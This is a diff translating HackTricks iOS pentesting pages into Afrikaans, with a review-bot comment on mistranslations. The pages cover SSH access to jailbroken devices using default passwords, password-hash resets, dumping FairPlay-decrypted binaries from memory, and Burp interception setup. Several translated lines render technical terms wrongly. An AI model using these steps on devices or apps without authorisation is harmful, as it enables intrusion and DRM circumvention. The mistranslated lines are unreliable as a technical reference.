@@ -1183,34 +1117,34 @@ otool -L * [https://mas.owasp.org/MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064](https://mas.owasp.org/MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064) * [https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc](https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054](https://mas.owasp.org/MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054) -* [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS free course([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/)) +* [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS gratis kursus([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/)) * [https://www.sans.org/reading-room/whitepapers/testing/ipwn-apps-pentesting-ios-applications-34577](https://www.sans.org/reading-room/whitepapers/testing/ipwn-apps-pentesting-ios-applications-34577) * [https://www.slideshare.net/RyanISI/ios-appsecurityminicourse](https://www.slideshare.net/RyanISI/ios-appsecurityminicourse) * [https://github.com/prateek147/DVIA](https://github.com/prateek147/DVIA) * [https://github.com/prateek147/DVIA-v2](https://github.com/prateek147/DVIA-v2) * [https://github.com/OWASP/MSTG-Hacking-Playground%20](https://github.com/OWASP/MSTG-Hacking-Playground) -* OWASP iGoat [_https://github.com/OWASP/igoat_](https://github.com/OWASP/igoat) <<< Objective-C version [_https://github.com/OWASP/iGoat-Swift_](https://github.com/OWASP/iGoat-Swift) <<< Swift version +* OWASP iGoat [_https://github.com/OWASP/igoat_](https://github.com/OWASP/igoat) <<< Objective-C weergawe [_https://github.com/OWASP/iGoat-Swift_](https://github.com/OWASP/iGoat-Swift) <<< Swift weergawe * 
[https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) * [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md b/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md index 1bc897e64..c26241378 100644 --- a/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -1,203 +1,177 @@ -# iOS Basic Testing Operations +# iOS Basiese Toetsoperasies
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Summary of iOS Device Identification and Access** +## **Opsomming van iOS-toestelidentifikasie en toegang** -### **Identifying the UDID of an iOS Device** +### **Identifisering van die UDID van 'n iOS-toestel** -To identify an iOS device uniquely, a 40-digit sequence known as the UDID is used. On macOS Catalina or newer, this can be found in the **Finder app**, as iTunes is no longer present. The device, once connected via USB and selected in Finder, reveals its UDID among other information when the details under its name are clicked through. +Om 'n iOS-toestel uniek te identifiseer, word 'n 40-syfer-reeks bekend as die UDID gebruik. Op macOS Catalina of nuwer kan dit in die **Finder-app** gevind word, aangesien iTunes nie meer teenwoordig is nie. Die toestel, sodra dit via USB gekoppel is en in Finder gekies is, openbaar sy UDID saam met ander inligting wanneer die besonderhede onder sy naam deurgeklik word. -For versions of macOS prior to Catalina, iTunes facilitates the discovery of the UDID. Detailed instructions can be found [here](http://www.iclarified.com/52179/how-to-find-your-iphones-udid). +Vir weergawes van macOS vóór Catalina fasiliteer iTunes die ontdekking van die UDID. Gedetailleerde instruksies kan hier gevind word [hier](http://www.iclarified.com/52179/how-to-find-your-iphones-udid). 
-Command-line tools offer alternative methods for retrieving the UDID: - -* **Using I/O Registry Explorer tool `ioreg`:** +Opdraggereelhulpmiddels bied alternatiewe metodes vir die ophaling van die UDID: +* **Met behulp van die I/O Registry Explorer-hulpmiddel `ioreg`:** ```bash $ ioreg -p IOUSB -l | grep "USB Serial" ``` - -* **Using `ideviceinstaller` for macOS (and Linux):** - +* **Gebruik van `ideviceinstaller` vir macOS (en Linux):** ```bash $ brew install ideviceinstaller $ idevice_id -l ``` - -* **Utilizing `system_profiler`:** - +* **Gebruik van `system_profiler`:** ```bash $ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p;/iPod/,/Serial/p' | grep "Serial Number:" ``` - -* **Employing `instruments` to list devices:** - +* **Gebruik van `instruments` om toestelle te lys:** ```bash $ instruments -s devices ``` +### **Toegang tot die toestel se skulp** -### **Accessing the Device Shell** +**SSH-toegang** word geaktiveer deur die **OpenSSH-pakket** na die gevangenisbreking te installeer, wat verbinding via `ssh root@` moontlik maak. Dit is noodsaaklik om die verstek wagwoorde (`alpine`) vir gebruikers `root` en `mobile` te verander om die toestel te beveilig. -**SSH access** is enabled by installing the **OpenSSH package** post-jailbreak, allowing connections via `ssh root@`. It's crucial to change the default passwords (`alpine`) for users `root` and `mobile` to secure the device. - -**SSH over USB** becomes necessary in the absence of Wi-Fi, using `iproxy` to map device ports for SSH connections. This setup enables SSH access through USB by running: +**SSH oor USB** word nodig as daar geen Wi-Fi beskikbaar is nie, deur `iproxy` te gebruik om toestel poorte vir SSH-verbindinge te karteer. 
Hierdie opset maak SSH-toegang moontlik deur USB te gebruik deur die volgende uit te voer: ```bash $ iproxy 2222 22 $ ssh -p 2222 root@localhost ``` +**Op-toestel skulprogramme**, soos NewTerm 2, fasiliteer direkte toestelinteraksie, wat veral nuttig is vir foutopsporing. **Omgekeerde SSH-skulprogramme** kan ook opgestel word vir afstandsbediening vanaf die gasrekenaar. -**On-device shell applications**, like NewTerm 2, facilitate direct device interaction, especially useful for troubleshooting. **Reverse SSH shells** can also be established for remote access from the host computer. +### **Herstel van vergeetde wagwoorde** -### **Resetting Forgotten Passwords** +Om 'n vergeetde wagwoord terug te stel na die verstekwaarde (`alpine`), is dit nodig om die `/private/etc/master.passwd`-lêer te wysig. Dit behels die vervanging van die bestaande has met die has vir `alpine` langs die `root`- en `mobile`-gebruikersinskrywings. -To reset a forgotten password back to the default (`alpine`), editing the `/private/etc/master.passwd` file is necessary. This involves replacing the existing hash with the hash for `alpine` next to the `root` and `mobile` user entries. +## **Data-oordragtegnieke** -## **Data Transfer Techniques** - -### **Transferring App Data Files** - -**Archiving and Retrieval via SSH and SCP:** It's straightforward to archive the application's Data directory using `tar` and then transfer it using `scp`. The command below archives the Data directory into a .tgz file, which is then pulled from the device: +### **Oordrag van App Data-lêers** +**Argivering en herwinning via SSH en SCP:** Dit is maklik om die Data-gids van die toepassing te argiveer met behulp van `tar` en dit dan oor te dra met behulp van `scp`. 
Die onderstaande opdrag argiveer die Data-gids in 'n .tgz-lêer, wat dan van die toestel afgehaal word: ```bash tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693 exit scp -P 2222 root@localhost:/tmp/data.tgz . ``` +### **Grafiese Gebruikerskoppelvlak-hulpmiddels** -### **Graphical User Interface Tools** +**Gebruik van iFunbox en iExplorer:** Hierdie GUI-hulpmiddels is nuttig vir die bestuur van lêers op iOS-toestelle. Tog het Apple vanaf iOS 8.4 hierdie hulpmiddels se toegang tot die toepassingsandbox beperk, tensy die toestel gejailbreak is. -**Using iFunbox and iExplorer:** These GUI tools are useful for managing files on iOS devices. However, starting with iOS 8.4, Apple restricted these tools' access to the application sandbox unless the device is jailbroken. - -### **Using Objection for File Management** - -**Interactive Shell with Objection:** Launching objection provides access to the Bundle directory of an app. From here, you can navigate to the app's Documents directory and manage files, including downloading and uploading them to and from the iOS device. +### **Gebruik van Objection vir Lêerbestuur** +**Interaktiewe Skulp met Objection:** Deur objection te begin, verkry jy toegang tot die Bundel-gids van 'n toepassing. Van hier af kan jy na die toepassing se Dokumente-gids navigeer en lêers bestuur, insluitend aflaai en oplaai na en van die iOS-toestel. ```bash objection --gadget com.apple.mobilesafari explorer cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents file download ``` +## **Verkryging en Uitpak van Programme** -## **Obtaining and Extracting Apps** - -### **Acquiring the IPA File** - -**Over-The-Air (OTA) Distribution Link:** Apps distributed for testing via OTA can be downloaded using the ITMS services asset downloader tool, which is installed via npm and used to save the IPA file locally. 
+### **Verkryging van die IPA-lêer** +**Over-The-Air (OTA) Verspreidingskoppeling:** Programme wat vir toetsing via OTA versprei word, kan afgelaai word deur die ITMS-diens bate-aflaaier-hulpmiddel te gebruik. Hierdie hulpmiddel word geïnstalleer via npm en word gebruik om die IPA-lêer lokaal te stoor. ```bash npm install -g itms-services itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist" -o - > out.ipa ``` +### **Uittreksel van die App Binêre** -### **Extracting the App Binary** +1. **Van 'n IPA:** Ontpak die IPA om toegang te verkry tot die gedekripteerde app binêre. +2. **Van 'n Jailbroken-toestel:** Installeer die app en onttrek die gedekripteerde binêre vanaf die geheue. -1. **From an IPA:** Unzip the IPA to access the decrypted app binary. -2. **From a Jailbroken Device:** Install the app and extract the decrypted binary from memory. +### **Dekripsieproses** -### **Decryption Process** - -**Manual Decryption Overview:** iOS app binaries are encrypted by Apple using FairPlay. To reverse-engineer, one must dump the decrypted binary from memory. The decryption process involves checking for the PIE flag, adjusting memory flags, identifying the encrypted section, and then dumping and replacing this section with its decrypted form. - -**Checking and Modifying PIE Flag:** +**Oorsig van Handmatige Dekripsie:** iOS-app-binêres word deur Apple versleutel met behulp van FairPlay. Om dit te herontwerp, moet die gedekripteerde binêre uit die geheue uitgelek word. Die dekripsieproses behels die kontroleer van die PIE-vlag, die aanpassing van geheuevlaggies, die identifisering van die versleutelde gedeelte, en dan die uitlek en vervanging van hierdie gedeelte met sy gedekripteerde vorm. 
+**Kontroleer en Wysig PIE-vlag:** ```bash otool -Vh Original_App python change_macho_flags.py --no-pie Original_App otool -Vh Hello_World ``` +**Identifiseer Versleutelde Seksie en Dump Geheue:** -**Identifying Encrypted Section and Dumping Memory:** - -Determine the encrypted section's start and end addresses using `otool` and dump the memory from the jailbroken device using gdb. - +Bepaal die begin- en eindadresse van die versleutelde sekisie deur `otool` te gebruik en dump die geheue van die jailbroken toestel met behulp van gdb. ```bash otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO dump memory dump.bin 0x8000 0x10a4000 ``` +**Oorskryf die Versleutelde Seksie:** -**Overwriting the Encrypted Section:** - -Replace the encrypted section in the original app binary with the decrypted dump. - +Vervang die versleutelde seksie in die oorspronklike app binêre lêer met die gedekripteerde dump. ```bash dd bs=1 seek= conv=notrunc if=dump.bin of=Original_App ``` +**Finale Dekripsie:** Wysig die metadata van die binêre lêer om aan te dui dat daar geen enkripsie is nie deur gebruik te maak van hulpmiddels soos **MachOView**, deur die `cryptid` in te stel op 0. -**Finalizing Decryption:** Modify the binary's metadata to indicate the absence of encryption using tools like **MachOView**, setting the `cryptid` to 0. - -### **Decryption (Automatically)** +### **Dekripsie (Outomaties)** #### **frida-ios-dump** -The [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) tool is employed for **automatically decrypting and extracting apps** from iOS devices. Initially, one must configure `dump.py` to connect to the iOS device, which can be done through localhost on port 2222 via **iproxy** or directly via the device's IP address and port. +Die [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) hulpmiddel word gebruik om **toepassings outomaties te dekripteer en te onttrek** vanaf iOS-toestelle. 
Aanvanklik moet `dump.py` gekonfigureer word om met die iOS-toestel te verbind, wat gedoen kan word deur middel van localhost op poort 2222 via **iproxy** of direk deur die IP-adres en poort van die toestel. -Applications installed on the device can be listed with the command: +Toepassings wat op die toestel geïnstalleer is, kan gelys word met die opdrag: ```bash $ python dump.py -l ``` - -To dump a specific app, such as Telegram, the following command is used: +Om 'n spesifieke app, soos Telegram, te dump, word die volgende bevel gebruik: ```bash $ python3 dump.py -u "root" -p "" ph.telegra.Telegraph ``` -This command initiates the app dump, resulting in the creation of a `Telegram.ipa` file in the current directory. This process is suitable for jailbroken devices, as unsigned or fake-signed apps can be reinstalled using tools like [**ios-deploy**](https://github.com/ios-control/ios-deploy). +Hierdie bevel begin die app-dump, wat lei tot die skepping van 'n `Telegram.ipa` lêer in die huidige gids. Hierdie proses is geskik vir jailbroken toestelle, aangesien ongetekende of vals-ondertekende programme herïnstalleer kan word met behulp van hulpmiddels soos [**ios-deploy**](https://github.com/ios-control/ios-deploy). #### **flexdecrypt** -The [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) tool, along with its wrapper [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), allows for the extraction of IPA files from installed applications. Installation commands for **flexdecrypt** on the device include downloading and installing the `.deb` package. **flexdump** can be used to list and dump apps, as shown in the commands below: - +Die [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) hulpmiddel, saam met sy omhulsel [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), maak dit moontlik om IPA-lêers uit geïnstalleerde programme te onttrek. 
Installasie-opdragte vir **flexdecrypt** op die toestel sluit die aflaai en installeer van die `.deb`-pakket in. **flexdump** kan gebruik word om programme te lys en te dump, soos getoon in die volgende opdragte: ```bash apt install zip unzip wget https://gist.githubusercontent.com/defparam/71d67ee738341559c35c684d659d40ac/raw/30c7612262f1faf7871ba8e32fbe29c0f3ef9e27/flexdump -P /usr/local/bin; chmod +x /usr/local/bin/flexdump flexdump list flexdump dump Twitter.app ``` - #### **bagbak** -[**bagbak**](https://github.com/ChiChou/bagbak), another Frida-based tool, requires a jailbroken device for app decryption: - +[**bagbak**](https://github.com/ChiChou/bagbak), nog 'n Frida-gebaseerde instrument, vereis 'n jailbroken toestel vir app dekripsie: ```bash bagbak --raw Chrome ``` - #### **r2flutch** -**r2flutch**, utilizing both radare and frida, serves for app decryption and dumping. More information can be found on its [**GitHub page**](https://github.com/as0ler/r2flutch). +**r2flutch**, wat beide radare en frida gebruik, dien vir app dekripsie en dump. Meer inligting kan gevind word op sy [**GitHub-bladsy**](https://github.com/as0ler/r2flutch). -### **Installing Apps** +### **Installeer Apps** -**Sideloading** refers to installing applications outside the official App Store. This process is handled by the **installd daemon** and requires apps to be signed with an Apple-issued certificate. Jailbroken devices can bypass this through **AppSync**, enabling the installation of fake-signed IPA packages. +**Sideloading** verwys na die installeer van programme buite die amptelike App Store. Hierdie proses word hanteer deur die **installd daemon** en vereis dat programme onderteken moet word met 'n Apple-uitgereikte sertifikaat. Gehackte toestelle kan hierdie proses omseil deur middel van **AppSync**, wat die installasie van vals-ondertekende IPA-pakette moontlik maak. 
-#### **Sideloading Tools** +#### **Sideloading-hulpmiddels** -- **Cydia Impactor**: A tool for signing and installing IPA files on iOS and APK files on Android. Guides and troubleshooting can be found on [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/). +- **Cydia Impactor**: 'n Hulpmiddel vir die onderteken en installeer van IPA-lêers op iOS en APK-lêers op Android. Gidse en probleemoplossing kan gevind word op [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/). -- **libimobiledevice**: A library for Linux and macOS to communicate with iOS devices. Installation commands and usage examples for ideviceinstaller are provided for installing apps over USB. +- **libimobiledevice**: 'n Biblioteek vir Linux en macOS om met iOS-toestelle te kommunikeer. Installasie-opdragte en gebruiksvoorbeelde vir ideviceinstaller word verskaf vir die installeer van programme via USB. -- **ipainstaller**: This command-line tool allows direct app installation on iOS devices. +- **ipainstaller**: Hierdie opdraglynhulpmiddel maak direkte app-installasie op iOS-toestelle moontlik. -- **ios-deploy**: For macOS users, ios-deploy installs iOS apps from the command line. Unzipping the IPA and using the `-m` flag for direct app launch are part of the process. +- **ios-deploy**: Vir macOS-gebruikers installeer ios-deploy iOS-apps vanaf die opdraglyn. Die IPA-lêer word uitgepakte en die `-m` vlag word gebruik vir direkte app-lancering as deel van die proses. -- **Xcode**: Utilize Xcode to install apps by navigating to **Window/Devices and Simulators** and adding the app to **Installed Apps**. +- **Xcode**: Gebruik Xcode om programme te installeer deur na **Window/Devices and Simulators** te navigeer en die app by **Installed Apps** te voeg. 
-#### **Allow Application Installation on Non-iPad Devices** -To install iPad-specific applications on iPhone or iPod touch devices, the **UIDeviceFamily** value in the **Info.plist** file needs to be changed to **1**. This modification, however, requires re-signing the IPA file due to signature validation checks. +#### **Toelaat van Toepassingsinstallasie op Nie-iPad-toestelle** +Om iPad-spesifieke programme op iPhone- of iPod touch-toestelle te installeer, moet die **UIDeviceFamily**-waarde in die **Info.plist**-lêer verander word na **1**. Hierdie wysiging vereis egter dat die IPA-lêer heronderteken word as gevolg van handtekeningvalideringskontroles. -**Note**: This method might fail if the application demands capabilities exclusive to newer iPad models while using an older iPhone or iPod touch. +**Let op**: Hierdie metode kan misluk as die toepassing funksies vereis wat eksklusief is vir nuwer iPad-modelle terwyl 'n ouer iPhone of iPod touch gebruik word. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/) * [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/) * [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/) @@ -206,14 +180,14 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
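Review bot: "shell" is mistranslated as "skulp" (the seashell sense) in `### **Toegang tot die toestel se skulp**`, "Op-toestel skulprogramme" and "Omgekeerde SSH-skulprogramme"; keep the untranslated term, e.g. `### **Toegang tot die toestel se shell**`. "Jailbreak" is rendered three different ways in the same file: "gevangenisbreking" (literally "prison break") in the SSH-toegang paragraph, "gejailbreak" under the GUI tools, and "Gehackte toestelle" under `### **Installeer Apps**`, while the frida-ios-dump and bagbak paragraphs already use "jailbroken" unchanged; pick the untranslated form everywhere. Smaller fixes on the `+` lines: "die bestaande has met die has vir `alpine`" should read "hash", "versleutelde sekisie" should be "seksie", "Die IPA-lêer word uitgepakte" should be "uitgepak", and "uit die geheue uitgelek" means "leaked" where the original says "dumped" ("gedump"). While the References block is being touched, its first entry `[https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/...)` has a link target missing the leading `h`, carried over unchanged from the source; fix it to `https://`.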
diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index ae93c59fb..d3c103817 100644 --- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -1,123 +1,120 @@ -# iOS Burp Suite Configuration +# iOS Burp Suite Konfigurasie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Installing the Burp Certificate on iOS Devices +## Installeer die Burp-sertifikaat op iOS-toestelle -For secure web traffic analysis and SSL pinning on iOS devices, the Burp Suite can be utilized either through the **Burp Mobile Assistant** or via manual configuration. Below is a summarized guide on both methods: +Vir veilige webverkeersanalise en SSL-pinning op iOS-toestelle kan die Burp Suite gebruik word deur die **Burp Mobile Assistant** of deur middel van handmatige konfigurasie. Hieronder is 'n opsomming van beide metodes: -### Automated Installation with Burp Mobile Assistant -The **Burp Mobile Assistant** simplifies the installation process of the Burp Certificate, proxy configuration, and SSL Pinning. Detailed guidance can be found on [PortSwigger's official documentation](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing). +### Outomatiese installasie met Burp Mobile Assistant +Die **Burp Mobile Assistant** vereenvoudig die installasieproses van die Burp-sertifikaat, proksi-konfigurasie en SSL-pinning. Gedetailleerde leiding is beskikbaar op [PortSwigger se amptelike dokumentasie](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing). -### Manual Installation Steps -1. **Proxy Configuration:** Start by setting Burp as the proxy under the iPhone's Wi-Fi settings. -2. 
**Certificate Download:** Navigate to `http://burp` on your device's browser to download the certificate. -3. **Certificate Installation:** Install the downloaded profile via **Settings** > **General** > **VPN & Device Management**, then enable trust for the PortSwigger CA under **Certificate Trust Settings**. +### Handmatige installasie-stappe +1. **Proksi-konfigurasie:** Begin deur Burp as die proksi in te stel onder die iPhone se Wi-Fi-instellings. +2. **Sertifikaat aflaai:** Navigeer na `http://burp` op jou toestel se blaaier om die sertifikaat af te laai. +3. **Sertifikaat-installasie:** Installeer die afgelaaide profiel via **Instellings** > **Algemeen** > **VPN & toestelbestuur**, en skakel dan vertroue in vir die PortSwigger CA onder **Sertifikaatvertrouensinstellings**. -### Configuring an Interception Proxy -The setup enables traffic analysis between the iOS device and the internet through Burp, requiring a Wi-Fi network that supports client-to-client traffic. If unavailable, a USB connection via usbmuxd can serve as an alternative. PortSwigger's tutorials provide in-depth instructions on [device configuration](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) and [certificate installation](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device). +### Konfigurering van 'n onderskeppingproksi +Die opset maak verkeersanalise tussen die iOS-toestel en die internet moontlik deur middel van Burp, wat 'n Wi-Fi-netwerk vereis wat kliënt-tot-kliënt-verkeer ondersteun. As dit nie beskikbaar is nie, kan 'n USB-verbinding via usbmuxd as 'n alternatief dien. 
